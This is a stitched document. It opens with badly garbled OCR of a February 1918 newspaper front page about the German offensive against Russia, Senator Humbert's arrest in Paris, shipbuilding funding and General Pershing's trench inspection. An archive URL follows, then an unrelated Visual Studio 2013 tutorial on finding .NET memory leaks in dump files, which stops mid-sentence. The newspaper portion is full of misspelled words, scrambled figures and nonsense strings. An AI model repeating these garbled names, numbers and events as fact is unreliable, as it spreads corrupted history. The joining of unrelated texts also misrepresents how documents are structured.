embark upon any anck . adyentnrea with the Brand fleet as Sir Erie Oedde referred to in hi speech of November." : r. Hir Krie . Geddes, in a epeeeh in the bouse of common on "November !,'. plsined why he did not regard s feas ibln- the suggestion v that the"' British era ad fleet should have, Invaded the Haiti Aa in attnek th German fleet nuerating against' Rusian port on th Baltld. 1 T ; LIST IS SMALLER ZXNDON, February JB (Asso ciated. Pre) British casualties In all of th war tboaWra war again below ti. avaraga of past week of tha war for th' vn day period which nde4 Saturday night aa waa shown in th com munique front th war depart ment issued yesterday. Tor tha first tUn In many week tha total 1 wU mid sr fly thoaaaad. Doth in action or aa tk re sult of wound reciyd In action ar announced to hay numbered 1043 f wbkk thlrtr-lgbt were oflken and 1006 war ullstad man. Th list of wounded and mlssinf number 8063 of which 119 war offlcm and SB44 war nlitd mtan.' . .. ..'-. - , TO INSPECT CATTLE MKXICO CITT, February lB-fAsso-eisted Pre Th government ban de cided to enforce ttrirtly measure to prevent the importation Into Mexico from the I'nited Btate of tubercular nattle. It i asserted tbat the bringing In of diseased cattle from north, of the Rio Orande, wher tha American meat inKpeetion aervie make their slaughter impossible, ba ' caused epidemic In Mexico. " , . RESUMPTION OF WA&ON RUSSIA AROUSING Kdisers Forces Cross Dviha Despite ; . Warnings . Issiied By press W;y ' , v of Austria : ; : ri OPENHAGEN, February ': 19 X- ; tween Germany and Russia flnfoo hatio rrncaort thn Pluino IVI ItUIU VI VvwVU . ilW VKIIU ..iif... 4W- n : . opposilian, the Russian remnants ; I Germany has struck in the face of the openly expressed oppo sition of her ally. Austro-Hunoary, and what is regarded as a deep schism has resulted between Berlin and Vienna. Diplomats in the Altiid and neutral capitals are watching keenly for some signs that wh) indicate the Austrian attitude in the face of the German defi ance of their wishes and announcements. ' . r .(. . , ' . 7 PRESS WARNS BERLIN ' : r V M ; , The Austrian press, for the past several days has been warn ing Germany against reopening hostilities on the eastern ' front which is opposed to every' Austrian desire. . Veiled. threats of a possible. withdrawal by. Austria from the Teutonic alliance. have been published and the desire of the Austrian people, for peace with Russia has been emphasized. .. . .' .;,v v The resumption of activities by the German army on the North Russian frnnt has hfiPn nffir.lallv 4 V A 4 4ta rnnMelM aAA l,u" u ww iiioii w uaacu jiio vima wii uui uiy uio aaiJni Ia. m mix iamma MAiNM Mitinn (ka aewia it tn A naniAel a 4fMn. MsisMiei. tice closed. ..:, " -. '...'-v ;-- 7; . FIRST OFFENSIVE TOLD )r, ; i i r wvvhiuiVii ' i win - wivrnrriivMs fwvtvw w wwiu fcvil iw f uivilf which publishes a Berlin statement that, the German first offensive will be directed against the Bolshevik! army in Esthonia and Livo nia now fjuarding the land approaches to Petroqrad. . UU..LU PUT U..DERARREST V-)V;-S" e , Senator ' Humbert ,: Taken ; Into A Custody In Connection With " Caiilaux Charges - TARIB, . Febrnary . 1 19- Associated TresH) Following directly In the wnke of the conviction of 8ol Pasha eame tke arrest of ', fenato. Humbert, pnb lisher of L Jouraal yesterday morning, His arrest had been expected and is ia liue with the expressed policy. of Clera eneeau when he assumed flic to run down aad ' punish all those connected with the -alleged Caiilaux aonaplracy. lit Was in Le Joii.nnl that th propa ganda of Caillonx and Harrail was pub lished for kbg time nnd nntil th publisher , wa finally . peremptorily halted. It U In connection with this that he wa arrested v and -upon uch publication and the alleged nubiidis ing of kia paper Win trial for conspiracy and treason will, ba based. Holo Pasha is said to have beea a stockholder la ' (Senator .. Humbert's paper. -.fi'?:-.-0''' ':" MONEY IS NEEDED TO SPEED. SHIPBUILDING uppiementary ' Appropriation of Hundred fAillion Asked WASHtKGTONV February 19 (As- sorlated Press) One hundred million dollars to speed - ntt shin building of the merchant fleet and for the purchase and construction of craft that can be used for hunting down and destroy ing enemy submarines is included ia sumdementary ' appropriation estimate which wer reported yesterday. . The billion doner urgent aenvienry bill passed th hcAis yesterday and is e pee ted ' to go, to the senate to day. As it ha the 'right of 'wv over all other legislation Its passage ia con fidently expected -before the ead of the week. --rr v ' . . ' . r. NEW YORK. February 10 (Assoc! sled Press) To Colonel Roosevelt, still in the hospital but now steadily recup ernting from bieJreCent aeriou illnes nd th operation for its relief, ramu the new yesterday of the birth of an other grand child,' his eighth grand son. The former President was told of the birth of a aon to Mr. and Mrs. Archie Rooserelt. ROOSEVELT ARRIVES WRATH I?. (Associated Press 'War bo has been resumed. German anrf aro ftiiahlnrt fnruirrl Ufithmit CAMM Ml W. UUUI I1IIU IWI nl fllUIVUI . .tn ' failing back or surrendering announcer! frnm Berlin. ivhrrA it A J 4lai MtiLM Msen C Aluweletii 4l.k mnfrTiTP ' n m i-y f " j Senate Committee Is Warr.cl f Something Must Be Done To-. " J .Keep Substitutes Available ;' WABHIXOTON. Fobmary 19 (A aoeiate.l ' Press) W'heatlcsa , weeks in . atead of wheatlesa days is an immi-- Bent drtnirer, C. H. Hyde of the Okla homa Counoil of . Pefens yesterday told the senate committee-on aerieul ture. ., His assertion ws made in con nection with his testimony on fond eon d it ions and the aoaring pries of wheat substitutes now greatly in demand by' reasoa of the regulation of ,the food administration far the conservation of Wheat. ','..- ..:.. v; ., - ' I'nless some steps taken to regn . late price of these - commodities aa wheat prieea. bav bee regulated, h believes they will rise t such figure to make their nn prohibitive with th bakrra and Iti.-people other than th wealthy., '. ; ' ,, v . , . . . '' ' t i i ill 4 f s . ' 1 ' ' MM OKIGIS Patrois : rjeet and Considerable Losses To Teutons Report-: edJFrom London ; r' NEW YORK, February " 10 f Asai. riated "Press) Patrol' encounters eul reconnoitering . niitl continue in most seetore of . the Western front, accord ing to the .report of yesterday. Thar is no cassation of th artillery fir nnd ' th great Teuton, driv is still 1 abey ance. .. . '' . . - ...' Patrol encounter ' war reported In th British official despatches : on tho Measinea sectors with considerable lose- : e inflicted on th Huns. , ,,. ., Along the Arra-Cambral road tho enemy wa directing a heavy artillery ; nr against Allied positions. ) ' ',.-', General Pershing completed a day of Inspection-in the American front line trenches on, th sector taken over br ' the Yankees. .,:' .. .; . , Protected tv ? tK' ; helmet worn W the American forces. the commauder . walked through ' tho first Un trench nnd visited all th bat teries nnd dugout. He sked Innumer-v sldo questions, especially regarding th food which tho American nr getting. One cook Answered him with oroo eritldw of the food, ying that it lack variety. : "'':, : .k Pershing mad a few auRgestion on various points. Wb.il walking through on trench he slipped and hurt hi an kia slightly. . , y .- .,. . Uisolosure that portugqes troop ar operating o th French front a fr north a is'euy Chapella were mad when the War office announced that tho Portuguese hav taken prisoners in that neighborhood. - , . ' .. RECO CHIEF ACTIVITY A';; , ,S. 'V'' ,:.' 4."' xml | txt
http://chroniclingamerica.loc.gov/lccn/sn83025121/1918-02-19/ed-1/seq-1/ocr/
CC-MAIN-2016-40
refinedweb
4,147
67.45
Colin Watson wrote: > Can you point me to where I would find the old spec? I see comments > about it in debconf's svn log, but the actual files don't seem to be in > the history ... Seems well and truely lost. I may have included it in the deb w/o including it in cvs. A container is the reason why the debconf question namespace allows "leaf" nodes to contain nodes. If you have a container foo/bar, and questions foo/bar/a, foo/bar/b, and foo/bar/c, then inputting foo/bar should prompt for the three nested questions. This was also supported in templates, so you might get the foo/bar container questions by REGISTER foo/template foo/bar. Of course, containers can also be nested. -- see shy jo Attachment: signature.asc Description: Digital signature
https://lists.debian.org/debian-boot/2005/04/msg00656.html
CC-MAIN-2016-36
refinedweb
139
67.35
Hi all, First of all Thanks for all your last responses , Here I have one problem in debugging the below code. It builds without any errors but it doesn't debugg or says some errors. I created a exe file and when I try to run the file it doesn't run. It doesn't create a file in the C:\Temp drive Any one could debug this? I debugged this code in VS2005 as C project. Is there any change to be made in the system environmental set up? Any change in the VS studio settings? Anyone help me? I am facing this problem last 48 hrs. here, GVS = C:\temp -------------------------------------------------test2.cpp-------------------------------- #include <stdio.h> #include <stdlib.h> #define ARG_ERROR 1 int main(int argc, char **argv) { FILE *fperr; char CARTERR[255]; while(argc--) printf("%s\n", *argv++); #ifdef WIN32 sprintf( CARTERR,"%s\\%s",getenv("GVS"),_CARTERR); #endif if( argc < 3) { printf( "Error in document\n"); fperr = fopen( CARTERR,"w"); fprintf( fperr,"%d:Error %s",ARG_ERROR); fclose( fperr); return( ARG_ERROR); } exit(EXIT_SUCCESS); }
https://www.daniweb.com/programming/software-development/threads/216005/error-in-debugging-c-code
CC-MAIN-2018-39
refinedweb
174
76.72
A simple twitter-bot command-line tool and library tweebot A twitter bot client, written in Python. This can be used as either a command-line tool, or as a library imported into your Python applications. Requirements - Python 3.3+ - A twitter account Installation To install: make install Development To build the dev environment: make venv . venv/bin/activate python main.py Configuration The application will only try to tweet if you provide a key file, which is formatted like: CONSUMER_KEY: dsafsafafsd CONSUMER_SECRET: iuhbfusdfiu44 ACCESS_KEY: vjhbv99889 ACCESS_SECRET: ivfjslfiguhg98 OR the equivalent JSON. The filename must be provided using the --keys command-line argument. Command-line usage Tweeting To tweet a simple status update: tweebot --keys {twitter-key-file} tweet "Hello world, this is my Tweebot status update!" -vv You can control verbosity with the number of vs. More command-line options are possible, try --help to see them all. If you use - for the tweet text, the application will use standard input, which can be handy for piping info from your bots – ie, use an arbitrary application to pipe to tweebot which can tweet it out. Following To automatically follow new followers, and unfollow unfollowers: tweebot --keys {twitter-key-file} follow --auto Library usage There are two basic ways you can use this in a library: you can either import the TwitterClient class and control that from your application, or you can import tweebot’s main function and provide it with a callback that will generate your status updates. tweebot.main If you provide a callable to tweebot.main, then tweebot will use it as a callback when the main function is called. The main method implements all the command-line tweebot arguments, the difference is that if the program is asked to tweet an empty status, it will instead tweet the results of your method, called with no arguments. If you tweet a non-empty status, that string will be handed to your method, and the result will be tweeted: mytweebot --keys {twitter-key-file} tweet -vv Thus, this provides a simple way to define new twitter-bots: define a method of the form: def my_tweet_builder(status, directives): new_status = do_something() return new_status # or return new_status, new_directives This can either ignore the status it’s given, or use it in any way you wish. If you have multiple bots that modify the status when given, then you could run them independently, or pipe them together in novel ways without recompiling – your choice. Direct client use If you want your application to be in control, you can simply import tweebot.TwitterClient and use its methods directly. This includes direct API access (via tweepy) to twitter, and few custom, convenience methods. Download Files Download the file for your platform. If you're not sure which to choose, learn more about installing packages.
https://pypi.org/project/tweebot/
CC-MAIN-2017-34
refinedweb
470
50.97
Converting PDF to PDF/A with the BFO Java PDF Library v2.26 We first added PDF/A support to our API many years ago, but our focus was on validation - you load a PDF, and the API tells you if its valid or not. If a file isn't PDF/A and you need it to be, we've got a method to fix that too: OutputProfiler.apply(). Give this method a target OutputProfile, such as PDF/A-1b:2005, and it will adjust the PDF to match. But in many cases the PDF was beyond what we could repair, and apply() threw an Exception indicating conversion failed. At that point your only real option was to rasterize each page to a bitmap image to replace the original, perhaps even copying those pages to a new PDF if the original had content we couldn't repair. This is how we've done things for years, and while it works, there were two main problems with it: - You, the developer had to write quite a lot of code to manage the process - checking for failures, choosing the correct ColorSpace, deciding what to do if conversion failed. These decisions meant that a "one click" solution was hard for us to offer. - Conversion to bitmap happened more than it needed to, and it's slow. What's more, when it happens something is usually lost in the process. Most obviously the text is no longer searchable, but potentially more, depending on how much work the developer has put in to "salvage" content from the original PDF: metadata, bookmarks and so on. We've helped many customers doing variations on this same task, and it seemed the right time to bring it in-house and package it up to make it easier. A couple of weeks work, we figured. Well, four months later, it turns out we figured wrong. But the new approach is quite an improvement. So what follows below is a step-by-step guide to the process. These steps are also wrapped up in a new example, ConvertToPDFA.java (download), which we now ship with the API. It's a standalone class designed to be incorporated into your code, with a main method so you can test from the command line. We've run this over 17,000 test files here, converting all to PDF/A-1, A-2 and A-3, comparing the results to both Acrobat and veraPDF. We're confident it will handle whatever PDF you feed it. Here's how it works. The basics: Setup and Fonts PDF/A requires all visible text to be rendered in an embedded font, so the first thing you're going to need for conversion to PDF/A is a set of fonts for substitution. But which ones? Based on a survey of our test files here, the most common unembedded fonts are, in order: - Times - Helvetica - Arial - Courier - Symbol - ZapfDingbats - Arial Narrow - Helvetica Narrow - Helvetica Black - Palatino - Helvetica Black - Letter Gothic - New Century Schoolbook - Tahoma - Verdana Of course this is very western-centric, as we've been bulk testing with the GovDocs Corpora. Chinese/Japanese/Korean documents have a much higher proportion of unembedded fonts due to their size and the fact their glyphs have regular metrics, whereas Cyrillic, Arabic, Hebrew, Hindi etc. fonts will almost always be be embedded. So we don't recommend you include all of those. Many uses of Times, Helvetica, Courier and almost all of Symbol or ZapfDingbats refer to the Standard 14 PDF fonts, which have a predefined set of glyphs. We include free substitutions for those with the API. For the rest, if we can't find a match based on the font name, we'll ensure we choose a font that has all the required glyphs and the most similar metrics to the font it's replacing. What we recommend is including the Times, Arial, and Courier fonts that ship with Windows (assuming you're running Windows). Don't forget the bold and italic variations. We also recommend at least one of the Noto CJK fonts, typically NotoSansCJKsc-Regular.otf, and ideally a narrow sans-serif font, such as Arial-Narrow, which will serve as a match for any narrow fonts. In total that's about 15 fonts. Here's how we'd OutputProfiler and giving it some fonts to substitute. import org.faceless.pdf2.*; import java.util.*; import java.io.*; import java.awt.color.ColorSpace; PDF pdf = new PDF(new PDFReader(new File("input.pdf"))); OutputProfiler profiler = new OutputProfiler(new PDFParser(pdf)); OutputProfile profile = profiler.getProfiler(); OutputProfile target = OutputProfile.PDFA1b_2005; if (profile.isCompatibleWith(target) == null) { return "PDF is already compatible with PDF/A-1b"; } // We need to convert the PDF. Load some fonts. OutputProfiler.AutoEmbeddingFontAction fa = new OutputProfiler.AutoEmbeddingFontAction(); fa.add(new OpenTypeFont(new File("path/to/NotoSansCJKsc-Regular.otf", null))); fa.add(new OpenTypeFont(new File("path/to/times.ttf", null))); fa.add(new OpenTypeFont(new File("path/to/timesi.ttf", null))); fa.add(new OpenTypeFont(new File("path/to/timesbd.ttf", null))); fa.add(new OpenTypeFont(new File("path/to/timesbi.ttf", null))); fa.add(new OpenTypeFont(new File("path/to/arial.ttf", null))); fa.add(new OpenTypeFont(new File("path/to/ariali.ttf", null))); // etc profiler.setFontAction(fontAction); Color Conversion also requires that all device-dependent color is made device-independent/calibrated, and choosing the best way to do this is the most complicated aspect of any PDF/A conversion. The example below shows the basics, but we'll expand on this later (and in the ConvertToPDFA.java example too). The best approach is to assign the PDF an Output Intent, which describes the ICC Color Profile of the device the document is intended for. But this is just a single ICC profile; if your PDF has both device-dependent RGB and device-dependent CMYK then previously your only option was to rasterize. This release expands the existing ProcessColorAction object which you supply to the OutputProfiler to convert color. You can now supply it with a number of ColorSpace objects - some RGB, some CMYK - and it will choose the appropriate ones to anchor device-dependent colors that don't match the Output Intent to an ICC profile. Which profiles should you supply? In Europe, we recommend FOGRA39 ("Coated FOGRA 39 300" is a good choice), and in the Americas we recommend SWOP2013. In Japan, "Japan Color 2011". ICC profiles for all of these are available for download at. Java color is entirely based on sRGB, so that's usually the best choice for RGB. Always supply at least one RGB and one CMYK to ensure conversion can succeed. // We usually want our OutputProfile to have an "Output Intent", so choose // one. We'll go with the FOGRA CMYK profile for now, but see below // for some real-world advice target = new OutputProfile(target); ColorSpace fogra39 = new ICCColorSpace(new File("Coated_Fogra39L_VIGC_300.icc"))); ColorSpace srgb = ColorSpace.getInstance(ColorSpace.CS_sRGB); OutputIntent intent = new OutputIntent("GTS_PDFA1", null, fogra39); target.getOutputIntents().add(intent); List<ColorSpace> cslist = new ArrayList<>(); cslist.add(srgb); cslist.add(fogra39); OutputProfiler.ProcessColorAction action = new OutputProfiler.ProcessColorAction(target, cslist); profiler.setColorAction(action); Strategy: what do do with the rest Any conversion from PDF to PDF/A potentially involves data loss: for example, PDF/A-1 doesn't allow embedded files, so f they exist they need to be deleted. But an API can't just delete content from your document without your instruction! We need to give you, the developer, some control over this process. For that we have a new setStrategy() method. The Default strategy will not delete content from the PDF, and conversion may fail as a result - you can deal with it in your code. We have other strategies for conversion, and we suspect the most useful will be JustFixIt - it does whatever it takes to make the file compliant with your target profile. If we need to delete attached files, or remove digital signatures to do this, choose this strategy and we can. profiler.setStrategy(OutputProfiler.Strategy.JustFixIt); JustFixIt is a shorthand for a combination of several other strategies, so it's possible to customize the process. See the API docs for more detail. Rasterizing where required, Rebuilding as a last resort With PDF/A-1 in particular, we may have to rasterize the document due to features we just can't work around, such as transparency. With PDF/A-2 or later it's much less common (required on only 316 of our 100,561 test pages), but it can still happen: for example, if the PDF nests save/restore operations deeper than the recommended maximum of 26. Where previously we would fail with an Exception and let you sort out the rasterization yourself, we now have a new Rasterizing Action which will do this for you. This approach means we'll only rasterize the pages that are causing problems, and we'll overlay the rasterized page with invisible text, retaining any structure on the page for the PDF structure tree. Text will remain selectable and searchable, and the PDF can continue to meet the requirements of PDF/A-1 or PDF/UA. (There will be cases where we can't overlay the text - for example, where the text on the page uses to a undefined encoding. If this is the case, you'll just get the plain bitmap with no invisible text). OutputProfile.RasterizingAction ra = new OutputProfiler.RasterizingAction(); ra.setDPI(200); // the default profiler.setRasterizingAction(ra); // Setup all done! Convert the PDF to PDF/A profiler.apply(targetprofile); Even after all of this, there are still cases where the resulting PDF is not PDF/A. Most likely this is due to fundamental architectural limits (such as arrays with more than 8191 entries) which are just not allowed. All we can do here is "rebuild" - clear out the PDF entirely, then put back only data which we know is OK. This is very much a last resort, and not common - of 5000 tests this occurred in just 36, and 31 of those were test files designed to provoke this situation. However it will happen if no suitable font can be found for substitution, for example, or if our code failed to convert for any other reason. Think of the "Rebuild" step as the insurance step. If you absolutely, positively need a PDF/A at the other end of this process, enable Rebuild. In our example, it's already enabled - it's part of the JustFixIt strategy we set above. Real world experience What we've got above, in about 40 lines of code, is a very simple example to convert a PDF to PDF/A-1b with a CMYK output intent. But in the real world there are a lot of other things to consider. What if the PDF already meets PDF/A-1a, or A-2b? Or even PDF/UA-1 or ZUGFeRD? Well, the above code specifies PDF/A-1b so that's all you're going to get. A better approach would be to define a set of allowed targets which you'll accept - PDF/A-1a, PDF/A-1b, PDF-A/2a, etc. If the PDF is already compliant with one of these, great. And if it claims to be compliant with one of them but isn't, that's the one we'll choose to target. Otherwise we fall back to our default. OutputProfile target = OutputProfile.PDFA1a_2005; Collection<OutputProfile> allowed = Arrays.asList(OutputProfile.PDFA1b_2005, OutputProfile.PDFA1a_2005, OutputProfile.PDFA2a /* etc */); Collection<OutputProfile> claimed = profile.getClaimedOutputProfiles(); for (OutputProfile p : claimed) { if (allowed.contains(p)) { target = p; break; } } Notice we've chosen PDF/A-1a, not A-1b - the difference between A and B is the conformance level which in most cases shouldn't be a distinction that matters: it's a technical statement of what the PDF is capable of, and most workflows creating PDF/A files should have a policy similar to "use PDF/A-2a if you can, PDF/A-2u as the next choice, and PDF/A-2b as the last resort". The AutoConformance strategy (part of the JustFixIt strategy) lets us adjust conformance to match the PDF, essentially following the above policy. With this Strategy, use the "A" conformance level (the strictest one) as a target. PDF/UA, ZUGFeRD and PDF/X are a little different - we don't want to actively change the document to match these targets, but if the PDF already complies with one of these then we don't want to lose that. Another slight adjustment: OutputProfile target = OutputProfile.PDFA1a_2005; Collection<OutputProfile> allowed = Arrays.asList(OutputProfile.PDFA1b_2005, OutputProfile.PDFA1a_2005, OutputProfile.PDFA2a); Collection<OutputProfile> retained = Arrays.asList(OutputProfile.PDFUA1, OutputProfile.PDFX4, OutputProfile.ZUGFeRD1_Basic, OutputProfile.ZUGFeRD1_Comfort, OutputProfile.ZUGFeRD1_Extended); Collection<OutputProfile> claimed = profile.getClaimedOutputProfiles(); for (OutputProfile p : claimed) { if (allowed.contains(p)) { target = p; break; } } target = new OutputProfile(target); for (OutputProfile p : claimed) { if (retained.contains(p) && profile.isCompatibleWith(p) == null) { try { target.merge(p, profile); } catch (ProfileComplianceException e) { // Combination is not possible. } } } To keep things simple, we haven't shown how to remove a claim of PDF/UA etc. if it can't be met. It's shown in the attached example. What do I use for an OutputIntent? CMYK or RGB? Your first choice will typically be to reuse any OutputIntent in the original document; the original author knows best. We can only reuse it if its valid for PDF/A, but this test is fairly easy - we extend the above code that sets our "target" like so: for (OutputIntent intent : profile.getOutputIntents()) { if (intent.isCompatibleWith(target) == null) { target.getOutputIntents().add(new OutputIntent("GTS_PDFA1", intent)); } } But if after that you still don't have a GTS_PDFA1 OutputIntent, you'll need to choose either CMYK or RGB. Unfortunately this is a slightly complicated choice to make - Acrobat, and possibly other tools, make a decision on whether to display a PDF with simulated overprint or not based on a few factors, one of which seems to be the Output Intent of the document. So this choice is significant. The ad-hoc algorithm we're using is subject to revision, but is currently: if the PDF makes use of Overprint, CMYK blending, has a Cyan, Magenta or Yellow separation, or if it doesn't make use of device-dependent RGB color, it's probably best to use CMYK. Otherwise, we use RGB. To implement this, we add this block after the block above. if (target.getOutputIntents().isEmpty()) { boolean cmyk = false; for (OutputProfile.Separation s : profile.getColorSeparations()) { String n = s.getName(); cmyk |= n.equals("Cyan") || n.equals("Magenta") || n.equals("Yellow"); } cmyk |= profile.isSet(OutputProfile.Feature.TransparencyGroupCMYK); cmyk |= profile.isSet(OutputProfile.Feature.Overprint); cmyk |= !profile.isSet(OutputProfile.Feature.ColorSpaceDeviceRGB); ColorSpace cs = cmyk ? fogra39 : srgb; OutputIntent intent = new OutputIntent("GTS_PDFA1", null, cs); if (intent.isCompatibleWith(target) == null) { target.getOutputIntents().add(intent); } } Other options you might want to consider are reusing an ICC profile from the incoming PDF, and keeping any existing non-PDF/A Output Intents - a PDF can be both PDF/A and PDF/X-4, with two Output Intents, so long as they both refer to the same color space (although earlier versions of PDF/X disallow this). The attached example shows how to do both. Conclusion The ConvertToPDFA.java example (download) encapsulates everything described above. It's a reusable class which you can incorporate in your own project, and if you're in the business of converting PDF to PDF/A, we hope it's going to make your life a lot easier. The example is also included in the examples folder of the PDF library download. In the event the process needs revising, we'll keep this article (and the example) up to date with footnotes. In particular conversion to PDF/A-4 has only had minimal testing at this point, so watch this space.
https://bfo.com/blog/2021/08/04/converting_pdf_to_pdf_a/
CC-MAIN-2021-43
refinedweb
2,640
57.06
Overview Atlassian Sourcetree is a free Git and Mercurial client for Windows. Atlassian Sourcetree is a free Git and Mercurial client for Mac. ansicolortags ansicolortags, a Python script and module to simply and efficiently use ANSI colors in a command line Python program. The ansicolortags module provides an efficient and useful function ( printc) to print colored text in a terminal application with Python 2 and 3, with a HTML-tag like style: from ansicolortags import printc # Import the function # ... printc("France flag is <blue>blue<reset>, <red>red<reset>, and <white>white<reset> !") will print the text "France flag is blue, white and red !" with appropriate colors (if the output supports them -- a terminal should but a file or a pipe should not). All ANSI colors code are defined with this HTML-tag like style: <blue>, <red> etc. This point is the main interest of this module, because all others modules define function to print with some colours. For instance, the screenshot below shows the module begin used to print a colored text (the help of the script) which looks like this: Author? Language? Python v2.7+ or Python v3.1+. This project is hosted on the Pypi package repository. Documentation The complete documentation of the module is available, see here on readthedocs.io. All the details (installation, options, etc) are in the doc. Anyway, here are some information. Installation ? The project consists in just the main script ansicolortags.py. How to install it Download the archive from this git repository, extract it, then launch python setup.py install in the directory. More details can be found in the INSTALL file. Dependencies The project is entirely written in Python, compatible with both version 2.7+ and 3.1+. For more details about the Python language, see the official site. Platforms The project have been developed on GNU/Linux (Ubuntu 11.10 to 15.10). Warning : Windows ? It also have been quickly tested on Windows 7 with the Cygwin environment and Python 2.7. Warning : Mac OS X ? It should also work on Mac OS X, but not been tested. Any feedback on this is welcome! Contact me Feel free to contact me, with a Bitbucket message (my profile is lbesson), or via an email at lilian DOT besson AT ens-cachan DOT org. License This project is released under the MIT License.
https://bitbucket.org/lbesson/ansicolortags.py
CC-MAIN-2018-30
refinedweb
392
67.35
Update: Note this post has been updated for Visual Studio 2013 RTM and is the first of a two-part series. In the screenshots and examples Just My Code and Collapse Small Objects are disabled as covered in part 2. It is recommended that you read this post before reading part 2. One. In this post, I’ll first discuss common types of memory problems and why they matter. I’ll then walk through an example of how to collect data, and finally describe how to use the new functionality to solve memory problems in your applications. Before I begin, there are a few things to note about the “Debug Managed Memory” feature discussed in this post: - The option will only be available from the dump summary page in the Ultimate version of Visual Studio 2013. If you are using Premium or Professional you will not see the option - The process the dump file was collected against must have been running on .NET 4.5 or higher. If the dump was collected on 3.5 or previous the option will not appear, if it was collected on 4.0 it will fail to launch with an error message. Why worry about memory problems .NET is a garbage collected runtime, which means most of the time the framework’s garbage collector takes care of cleaning up memory and the user never notices any impact. However, when an application has a problem with its memory this can have a negative impact on both the application and the machine. - Memory leaks are places in an application where objects are meant to be temporary, but instead are left permanently in memory. In a garbage collected runtime like .NET, developers do not need to explicitly free memory like they need to do in a runtime like C++. However the garbage collector can only free memory that is no longer being used, which it determines based on whether the object is reachable (referenced) by other objects that are still active in memory. So a memory leak occurs in .NET when an object is still reachable from the roots of the application but should not be (e.g. a static event handler references an object that should be collected). When memory leaks occur, usually memory increases slowly over time until the application starts to exhibit poor performance. Physical resource leaks are a sub category of memory leaks where a physical resource such as a file, or OS handler is accidentally left open or retained. This can lead to errors later in execution as well as increased memory consumption. - Inefficient memory use is when an application is using significantly more memory than intended at any given point in time, but the memory consumption is not the result of a leak. An example of inefficient memory use in a web application is querying a database and bringing back significantly more results than are needed by the application. - Unnecessary allocations. In .NET, allocation is often quite fast, but overall cost can be deceptive, because the garbage collector (GC) needs to clean it up later. The more memory that gets allocated, the more frequently the GC will need to run. These GC costs are often negligible to the program’s performance, but for certain kinds of apps, these costs can add up quickly and make a noticeable impact to the performance of the app If an application suffers from a memory problem, there are three common symptoms that may affect end users. - The application can crash with an “Out of Memory” exception. This is a relatively common problem for 32bit applications because they are limited to only 4GB of total Virtual Address Space. It is however less common for 64bit applications because they are given much higher virtual address space limits by the operating system. - The application will begin to exhibit poor performance. This can occur because the garbage collector is running frequently and competing for CPU resources with the application, or because the application constantly needs to move memory between RAM (physical memory) and the hard drive (virtual memory); which is called paging. - Other applications running on the same machine exhibit poor performance. Because the CPU and physical memory are both system resources, if an application is consuming a large amount of these resources, other applications are left with insufficient amounts and will exhibit negative performance. In this post I’ll be covering a new feature added to Visual Studio 2013 intended to help identify memory leaks and inefficient memory use (the first two problem types discussed above). If you are interested in tools to help identify problems related to unnecessary allocations, see .NET Memory Allocation Profiling with Visual Studio 2012. Collecting the data To understand how the new .NET memory feature for .dmp files helps us to find and fix memory problems let’s walk through an example. For this purpose, I have introduced a memory leak when loading the Home page of a default MVC application created with Visual Studio 2013. However to simulate how a normal memory leak investigation works, we’ll use the tool to identify the problem before we discuss the problematic source code. The first thing I am going to do is to launch the application without debugging to start the application in IIS Express. Next I am going to open Windows Performance Monitor to track the memory usage during my testing of the application. Next I’ll add the “.NET CLR Memory -> # Bytes in all Heaps” counter, which will show me how much memory I’m using in the .NET runtime (which I can see is ~ 3.5 MB at this point). You may use alternate or additional tools in your environment to detect when memory problems occur, I’m simply using Performance Monitor as an example. The important point is that a memory problem is detected that you need to investigate further. The next thing I’m going to do is refresh the home page five times to exercise the page load logic. After doing this I can see that my memory has increased from ~3.5 MB to ~13 MB so this seems to indicate that I may have a problem with my application’s memory since I would not expect multiple page loads by the same user to result in a significant increase in memory. For this example I’m going to capture a dump of iisexpress.exe using ProcDump, and name it “iisexpress1.dmp” (notice I need to use the –ma flag to capture the process memory, otherwise I won’t be able to analyze the memory). You can read about alternate tools for capturing dumps in what is a dump and how do I create one? Now that I’ve collected a baseline snapshot, I’m going to refresh the page an additional 10 times. After the additional refreshes I can see that my memory use has increased to ~21 MB. So I am going to use procdump.exe again to capture a second dump I’ll call “iisexpress2.dmp” Now that we’ve collected the dump files, we’re ready to use Visual Studio to identify the problem. Analyzing the dump files The first thing we need to do to begin analysis is open a dump file. In this case I’m going to choose the most recent dump file, “iisexpress2.dmp”. Once the file is open, I’m presented with the dump file summary page in Visual Studio that gives me information such as when the dump was created, the architecture of the process, the version of Windows, and what the version of the .NET runtime (CLR version) the process was running. To begin analyzing the managed memory, click “Debug Managed Memory” in the “Actions” box in the top right. This will begin analysis Once analysis completes I am presented with Visual Studio 2013’s brand new managed memory analysis view. The window contains two panes, the top pane contains a list of the objects in the heap grouped by their type name with columns that show me their count and the total size. When a type or instance is selected in the top pane, the bottom one shows the objects that are referencing this type or instance which prevent it from being garbage collected. [Note: At this point Visual Studio is in debug mode since we are actually debugging the dump file, so I have closed the default debug windows (watch, call stack, etc.) in the screenshot above.] Thinking back to the test scenario I was running there are two issues I want to investigate. First, 16 page loads increased my memory by ~18 MB which appears to be an inefficient use of memory since each page load should not use over 1 MB. Second, as a single user I’m requesting the same page multiple times, which I expect to have a minimal effect on the process memory, however the memory is increasing with every page load. Improving the memory efficiency First want to see if I can make page loading more memory efficient, so I’ll start looking at the objects that are using the most memory in the type summary (top pane) of memory analysis window. Here I see that Byte[] is the type that is using the most memory, so I’ll expand the System.Byte[] line to see the 10 largest Byte[]’s in memory. I see that this and all of the largest Byte[]’s are ~1 MB each which seems large so I want to determine what is using these large Byte[]’s. Clicking on the first instance shows me this is being referenced by a SampleLeak.Models.User object (as are all of the largest Byte[]’s if I work my way down the list). At this point I need to go to my application’s source code to see what User is using the Byte[] for. Navigating to the definition of User in the sample project I can see that I have a BinaryData member that is of type byte[]. It turns out when I’m retrieving my user from the database I’m populating this field even though I am not using this data as part of the page load logic. public class User : IUser { … [Key] public string Id { get; set; } public string UserName { get; set; } public byte[] BinaryData { get; set; } } Which is populated by the query User user = MockDatabase.SelectOrCreateUser( “select * from Users where Id = @p1”, userID); In order to fix this, I need to modify my query to only retrieve the Id and UserName when I’m loading a page, I’ll retrieve the binary data later only if and when I need it. User user = MockDatabase.SelectOrCreateUser( “select Id, UserName from Users where Id = @p1”, userID); Finding the memory leak The second problem I want to investigate is the continual growth of the memory that is indicating a leak. The ability to see what has changed over time is a very powerful way to find leaks, so I am going to compare the current dump to the first one I took. To do this, I expand the “Select Baseline” dropdown, and choose “Browse…” This allows me to select “iisexpress1.dmp” as my baseline. Once the baseline finishes analyzing, I have an additional two columns, “Count Diff” and “Total Size Diff” that show me the change between the baseline and the current dump. Since I see a 